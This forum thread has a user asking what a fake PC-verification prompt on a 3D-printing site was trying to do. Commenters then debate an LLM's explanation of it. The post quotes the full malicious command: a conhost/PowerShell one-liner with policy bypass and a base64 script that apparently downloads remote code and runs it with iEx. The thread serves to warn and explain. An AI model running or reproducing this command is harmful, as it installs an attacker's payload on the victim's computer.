Yeah don’t put this in but can anyone give me an idea of what they were trying to do? the website was https:\howchoo.\com\3dprinting\updating-octoprint
and used a real pc verification screen to try to get me to put this in Run
conhost cmd /c powershell /ep bypass /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcABzADoALwAvAG0AYQBzAHQAcgBhAHcALgB0AG8AcAAvAG0AZQAvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGREDACTED== /W 1
Not everyone can understand that it runs a privileged executable.
If it’s malware, it - by definition - is going to need to run a privileged executable. That’s the “ware” in “malware”. The LLM is just explaining the specific method they’re attempting to use - which again should be obvious both by the nature of the actions it’s requesting from the user as well as the specific text it’s asking to be run. It explicitly says it doesn’t know anything about the executable that’s being run, so it really isn’t offering anything particularly useful or actionable - just wasting resources.